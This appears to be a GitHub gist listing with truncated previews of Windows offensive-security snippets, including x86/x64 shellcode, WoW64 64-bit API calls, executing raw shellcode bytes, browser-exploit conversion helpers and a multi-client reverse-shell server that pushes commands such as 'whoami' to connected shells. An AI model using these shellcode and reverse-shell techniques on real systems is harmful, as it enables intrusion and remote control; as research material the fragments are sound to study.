This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# x96_shellcode.py | |
# ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049 | |
# by aaaddress1@chroot.org | |
''' | |
entry: | |
call $+5 | |
mov ax, cs | |
sub ax, 23h | |
je retTo32b | |
nop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; x96 shellcode (x32+x64) by aaaddress1@chroot.org | |
; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm | |
section .text | |
bits 32 | |
_main: | |
call entry | |
entry: | |
mov ax, cs | |
sub ax, 0x23 | |
jz retTo32b |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// get 64 bit Windows API in pure 32 bit mode! | |
// it's necessary to disable all the compiler optimization if you're using MSVC. | |
// more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102 | |
// by aaaddress1@chroot.org | |
#include <iostream> | |
#include <stdio.h> | |
#include <windows.h> | |
// ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h | |
#include "wow64ext.h" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode) | |
// by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
typedef struct _PEB_LDR_DATA64 | |
{ | |
ULONG Length; | |
BOOLEAN Initialized; | |
ULONG64 SsHandle; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// memcpy 32bit by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
int main(void) { | |
int dummy(0x41414242); | |
char buf[8] = {0}; | |
((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy)); | |
puts(buf); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// using WinHTTP to obtain binary data (MSVC) | |
// by aaaddress1@chroot.org | |
#include <vector> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <Winhttp.h> | |
#pragma comment(lib, "winhttp") | |
using namespace std; | |
vector<char>* httpRecv(const wchar_t url[]) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Helpers { | |
constructor() { | |
this.cvt_buf = new ArrayBuffer(8); | |
this.cvt_f64a = new Float64Array(this.cvt_buf); | |
this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
} | |
ftoi(f) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
Cmd Multiple RevShell Server by aaaddress1@chroot.org | |
[test] $ ncat localhost 54321 | cmd | |
''' | |
import time, socket | |
def handleClient(connection): | |
try: | |
time.sleep(1) | |
connection.send(b'whoami && echo 123 > ggdada.txt && exit\n') | |
except Exception as e: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// dynamic patch self function by aaaddress1@chroot.org | |
#include <windows.h> | |
#include <algorithm> | |
#include <iterator> | |
using namespace std; | |
void hello() | |
{ | |
puts("Are You Helloing?"); | |
} | |
int main(void) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// VEH Montior by aaaddress1@chroot.org | |
#include <stdio.h> | |
#include <windows.h> | |
#pragma warning( disable : 4996 ) | |
LONG __stdcall TrapFilter(PEXCEPTION_POINTERS pexinf) { | |
if (pexinf->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION && ((DWORD)pexinf->ExceptionRecord->ExceptionAddress & 0x80000000)) | |
pexinf->ContextRecord->Eip = pexinf->ContextRecord->Eip ^ 0x80000000; | |
else if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) | |
return EXCEPTION_CONTINUE_SEARCH; |